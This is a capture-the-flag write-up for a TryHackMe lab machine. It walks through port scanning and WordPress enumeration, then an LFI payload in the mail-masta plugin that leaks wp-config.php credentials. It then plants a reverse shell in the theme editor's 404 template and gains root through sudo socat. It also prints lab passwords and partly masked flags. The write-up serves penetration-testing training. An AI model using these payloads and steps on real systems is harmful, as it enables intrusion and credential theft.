💻All in One

Introduction

Room name: All in One Room link: https://tryhackme.com/r/room/allinonemj

1- Scanning

nmap -sS -sV 10.10.155.8

1a- Scan results:

1b- Open ports:

21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

2- Port 21 (ftp)

Lets first check if we can login as:

username: anonymous passowrd: anonymous

ftp 10.10.155.8

Successful!

2b- ftp enumeration

Now, lets check if the ftp share contains anything useful

ls -la

Empty.

Lets now leave ftp, and move to port 80

3- Port 80 (http)

2a- Nikto

nikto -h http://10.10.155.8

Nothing important.

3b- Gobuster

gobuster dir -u http://10.10.155.8 -w /usr/share/wordlists/amass/subdomains-top1mil-20000.txt

Gobuster results:

Important directory found: /wordpress

3c- Lets check the website on firefox

Type in the url: http://10.10.155.8

Source code:

Regarding the source code, no suspicious comment was found.

/wordpress enumeration

First, lets enumerate for users using the following command:

wpscan --url http://10.10.165.2/wordpress --enumerate u

User found!

Username: Elyana

Now, lets enumerate plugins and themes, using the following command:

wpscan --url http://10.10.165.2/wordpress --enumerate p,t

Themes:

Wordpress theme in use: twentytwenty

Plugins:

1- mail-masta:

2- reflex-gallery

mail-masta vulnerabilities

Now, lets start with mail-masta, and check for any vulnerabilities.

Lets go to exploit db, https://www.exploit-db.com/, enter "wordpress plugin mail masta" in the search bar:

3 vulnerabilities were found.

Lets check out the third one, which is a LFI (local file inclusion) vulnerability.

According to the exploit db, we should try to input this in the url:

http://10.10.155.8/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

and if the URL showed the /etc/passwd file, then a local file inclusion vulnerability is present.

Lets check:

It worked!

So, now our goal is to locate the wp-config.php

Instead of /etc/passwd, let replace it with php://filter/convert.base64-encode/resource=../../../../../wp-config.php

So, the url will be as follows: http://10.10.155.8/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php

Base 64 encoded text was found!

Base 64 encoded text:

PD9waHANCi8qKg0KICogVGhlIGJhc2UgY29uZmlndXJhdGlvbiBmb3IgV29yZFByZXNzDQogKg0KICogVGhlIHdwLWNvbmZpZy5waHAgY3JlYXRpb24gc2NyaXB0IHVzZXMgdGhpcyBmaWxlIGR1cmluZyB0aGUNCiAqIGluc3RhbGxhdGlvbi4gWW91IGRvbid0IGhhdmUgdG8gdXNlIHRoZSB3ZWIgc2l0ZSwgeW91IGNhbg0KICogY29weSB0aGlzIGZpbGUgdG8gIndwLWNvbmZpZy5waHAiIGFuZCBmaWxsIGluIHRoZSB2YWx1ZXMuDQogKg0KICogVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBmb2xsb3dpbmcgY29uZmlndXJhdGlvbnM6DQogKg0KICogKiBNeVNRTCBzZXR0aW5ncw0KICogKiBTZWNyZXQga2V5cw0KICogKiBEYXRhYmFzZSB0YWJsZSBwcmVmaXgNCiAqICogQUJTUEFUSA0KICoNCiAqIEBsaW5rIGh0dHBzOi8vd29yZHByZXNzLm9yZy9zdXBwb3J0L2FydGljbGUvZWRpdGluZy13cC1jb25maWctcGhwLw0KICoNCiAqIEBwYWNrYWdlIFdvcmRQcmVzcw0KICovDQoNCi8vICoqIE15U1FMIHNldHRpbmdzIC0gWW91IGNhbiBnZXQgdGhpcyBpbmZvIGZyb20geW91ciB3ZWIgaG9zdCAqKiAvLw0KLyoqIFRoZSBuYW1lIG9mIHRoZSBkYXRhYmFzZSBmb3IgV29yZFByZXNzICovDQpkZWZpbmUoICdEQl9OQU1FJywgJ3dvcmRwcmVzcycgKTsNCg0KLyoqIE15U1FMIGRhdGFiYXNlIHVzZXJuYW1lICovDQpkZWZpbmUoICdEQl9VU0VSJywgJ2VseWFuYScgKTsNCg0KLyoqIE15U1FMIGRhdGFiYXNlIHBhc3N3b3JkICovDQpkZWZpbmUoICdEQl9QQVNTV09SRCcsICdIQGNrbWVAMTIzJyApOw0KDQovKiogTXlTUUwgaG9zdG5hbWUgKi8NCmRlZmluZSggJ0RCX0hPU1QnLCAnbG9jYWxob3N0JyApOw0KDQovKiogRGF0YWJhc2UgQ2hhcnNldCB0byB1c2UgaW4gY3JlYXRpbmcgZGF0YWJhc2UgdGFibGVzLiAqLw0KZGVmaW5lKCAnREJfQ0hBUlNFVCcsICd1dGY4bWI0JyApOw0KDQovKiogVGhlIERhdGFiYXNlIENvbGxhdGUgdHlwZS4gRG9uJ3QgY2hhbmdlIHRoaXMgaWYgaW4gZG91YnQuICovDQpkZWZpbmUoICdEQl9DT0xMQVRFJywgJycgKTsNCg0Kd29yZHByZXNzOw0KZGVmaW5lKCAnV1BfU0lURVVSTCcsICdodHRwOi8vJyAuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLicvd29yZHByZXNzJyk7DQpkZWZpbmUoICdXUF9IT01FJywgJ2h0dHA6Ly8nIC4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJy93b3JkcHJlc3MnKTsNCg0KLyoqI0ArDQogKiBBdXRoZW50aWNhdGlvbiBVbmlxdWUgS2V5cyBhbmQgU2FsdHMuDQogKg0KICogQ2hhbmdlIHRoZXNlIHRvIGRpZmZlcmVudCB1bmlxdWUgcGhyYXNlcyENCiAqIFlvdSBjYW4gZ2VuZXJhdGUgdGhlc2UgdXNpbmcgdGhlIHtAbGluayBodHRwczovL2FwaS53b3JkcHJlc3Mub3JnL3NlY3JldC1rZXkvMS4xL3NhbHQvIFdvcmRQcmVzcy5vcmcgc2VjcmV0LWtleSBzZXJ2aWNlfQ0KICogWW91IGNhbiBjaGFuZ2UgdGhlc2UgYXQgYW55IHBvaW50IGluIHRpbWUgdG8gaW52YWxpZGF0ZSBhbGwgZXhpc3RpbmcgY29va2llcy4gVGhpcyB3aWxsIGZvcmNlIGFsbCB1c2VycyB0byBoYXZlIHRvIGxvZyBpbiBhZ2Fpbi4NCiAqDQogKiBAc2luY2UgMi42LjANCiAqLw0KZGVmaW5lKCAnQVVUSF9LRVknLCAgICAgICAgICd6a1klbSVSRlliOnUsL2xxLWlafjhmakVOZElhU2I9Xms8M1pyLzBEaUxacVB4enxBdXFsaTZsWi05RFJhZ0pQJyApOw0KZGVmaW5lKCAnU0VDVVJFX0FVVEhfS0VZJywgICdpQVlhazxfJn52OW8re2JAUlBSNjJSOSBUeS0gNlUteUg1YmFVRHs7bmRTaUNbXXFvc3hTQHNjdSZTKWQkSFtUJyApOw0KZGVmaW5lKCAnTE9HR0VEX0lOX0tFWScsICAgICdhUGRfKnNCZj1adWMrK2FdNVZnOT1QfnUwM1EsenZwW2VVZS99KUQ9Ok55aFVZe0tYUl10N300MlVwa1tyNz9zJyApOw0KZGVmaW5lKCAnTk9OQ0VfS0VZJywgICAgICAgICdAaTtUKHt4Vi9mdkUhcyteZGU3ZTRMWDN9TlRAIGo7YjRbejNfZkZKYmJXKG5vIDNPN0ZAc3gwIW95KE9gaCNNJyApOw0KZGVmaW5lKCAnQVVUSF9TQUxUJywgICAgICAgICdCIEFUQGk+KiBOI1c8biEqfGtGZE1uUU4pPl49XihpSHA4VXZnPH4ySH56Rl1pZHlRPXtAfTF9KnJ7bFowLFdZJyApOw0KZGVmaW5lKCAnU0VDVVJFX0FVVEhfU0FMVCcsICdoeDhJOitUejhuMzM1V2htels+JFVaOzhyUVlLPlJ6XVZHeUJkbW83PSZHWiFMTyxwQU1zXWYhelZ9eG46NEFQJyApOw0KZGVmaW5lKCAnTE9HR0VEX0lOX1NBTFQnLCAgICd4N3I+fGMwTUxecztTdzIqVSF4LntgNUQ6UDF9Vz0gL2Npe1E8dEVNPXRyU3YxZWVkfF9mc0xgeV5TLFhJPFJZJyApOw0KZGVmaW5lKCAnTk9OQ0VfU0FMVCcsICAgICAgICd2T2IlV3R5fSR6eDlgfD40NUlwQHN5WiBdRzpDM3xTZEQtUDM8e1lQOi5qUERYKUh9d0dtMSpKXk1TYnMkMWB8JyApOw0KDQovKiojQC0qLw0KDQovKioNCiAqIFdvcmRQcmVzcyBEYXRhYmFzZSBUYWJsZSBwcmVmaXguDQogKg0KICogWW91IGNhbiBoYXZlIG11bHRpcGxlIGluc3RhbGxhdGlvbnMgaW4gb25lIGRhdGFiYXNlIGlmIHlvdSBnaXZlIGVhY2gNCiAqIGEgdW5pcXVlIHByZWZpeC4gT25seSBudW1iZXJzLCBsZXR0ZXJzLCBhbmQgdW5kZXJzY29yZXMgcGxlYXNlIQ0KICovDQokdGFibGVfcHJlZml4ID0gJ3dwXyc7DQoNCi8qKg0KICogRm9yIGRldmVsb3BlcnM6IFdvcmRQcmVzcyBkZWJ1Z2dpbmcgbW9kZS4NCiAqDQogKiBDaGFuZ2UgdGhpcyB0byB0cnVlIHRvIGVuYWJsZSB0aGUgZGlzcGxheSBvZiBub3RpY2VzIGR1cmluZyBkZXZlbG9wbWVudC4NCiAqIEl0IGlzIHN0cm9uZ2x5IHJlY29tbWVuZGVkIHRoYXQgcGx1Z2luIGFuZCB0aGVtZSBkZXZlbG9wZXJzIHVzZSBXUF9ERUJVRw0KICogaW4gdGhlaXIgZGV2ZWxvcG1lbnQgZW52aXJvbm1lbnRzLg0KICoNCiAqIEZvciBpbmZvcm1hdGlvbiBvbiBvdGhlciBjb25zdGFudHMgdGhhdCBjYW4gYmUgdXNlZCBmb3IgZGVidWdnaW5nLA0KICogdmlzaXQgdGhlIGRvY3VtZW50YXRpb24uDQogKg0KICogQGxpbmsgaHR0cHM6Ly93b3JkcHJlc3Mub3JnL3N1cHBvcnQvYXJ0aWNsZS9kZWJ1Z2dpbmctaW4td29yZHByZXNzLw0KICovDQpkZWZpbmUoICdXUF9ERUJVRycsIGZhbHNlICk7DQoNCi8qIFRoYXQncyBhbGwsIHN0b3AgZWRpdGluZyEgSGFwcHkgcHVibGlzaGluZy4gKi8NCg0KLyoqIEFic29sdXRlIHBhdGggdG8gdGhlIFdvcmRQcmVzcyBkaXJlY3RvcnkuICovDQppZiAoICEgZGVmaW5lZCggJ0FCU1BBVEgnICkgKSB7DQoJZGVmaW5lKCAnQUJTUEFUSCcsIF9fRElSX18gLiAnLycgKTsNCn0NCg0KLyoqIFNldHMgdXAgV29yZFByZXNzIHZhcnMgYW5kIGluY2x1ZGVkIGZpbGVzLiAqLw0KcmVxdWlyZV9vbmNlIEFCU1BBVEggLiAnd3Atc2V0dGluZ3MucGhwJzsNCg==

Now, lets head to this website "https://www.base64decode.org/" to decode:

DB_USER: elyana DB_PASSWORD: H@ckme@123

Logging in as elyana

First, press on login, and enter elyana H@ckme@123 as username and password.

Successful login!

With the credentials found, lets try our luck and login into ssh:

ssh elyana@10.10.155.8

Failed.

Opening a Netcat Session

Lets open a netcat session:

nc -lvnp 1234

Lets now head to "Appearance", then "Theme Editor", then press on "404 Template"

Lets create a reverse shell from this website "https://www.revshells.com/", and paste it to the theme editor, then press "update file".

(Don't forget to update the ip and the port.)

To activate the file in order to open a netcat session successfully, lets type this in the url:

"http://10.10.155.8/wordpress/wp-content/themes/twentytwenty/404.php"

Successful connection!

Lets stanilize the shell using python3:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Now, lets head to /home

cd /home

There are 2 files:

hint.txt
user.txt

Lets try user.txt first:

cat user.txt

Lets check hint.txt:

hint.txt: "Elyana's user password is hidden in the system. Find it ;)"

So, lets type in this command:

find / -user elyana -type f 2>/dev/null

There is a file named private.txt:

cat /etc/mysql/conf.d/private.txt

So, we found a password: "E@syR18ght"

Port 22 (ssh)

Now, lets try to login to ssh using the password we found

ssh elyana@10.10.155.8

password: E@syR18ght

Successful login!

lets type cat user.txt

user.txt

user.txt: "VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZxxxxxxxxx"

Privilege escalation

lets start first with sudo -l

Important line: (ALL) NOPASSWD: /usr/bin/socat

Lets head now to this website "https://gtfobins.github.io/", and type "socat", then press on sudo:

Result:

sudo socat stdin exec:/bin/sh

Lets paste it directly into the terminal:

and we are root!!!!!

now, lets find "root.txt"

find / -name "root.txt" 2>/dev/null

cat /root/root.txt

root.txt: "VEhNe3VlbTJ3aWdidWVtMndpZ2I2OHNuMmoxb3NwaTg2OHNuMmoxxxxxxxxx"

PreviousStartup NextCat Pictures

Last updated 1 year ago

hashtagIntroduction

hashtag1- Scanning

hashtag1a- Scan results:

hashtag1b- Open ports:

hashtag2- Port 21 (ftp)

hashtag2a- ftp login

hashtag2b- ftp enumeration

hashtag3- Port 80 (http)

hashtag2a- Nikto

hashtag3b- Gobuster

hashtag3c- Lets check the website on firefox

hashtagSource code:

hashtag/wordpress enumeration

hashtagmail-masta vulnerabilities

hashtagLogging in as elyana

hashtagLets try ssh login

hashtagOpening a Netcat Session

hashtagPort 22 (ssh)

hashtaguser.txt

hashtagPrivilege escalation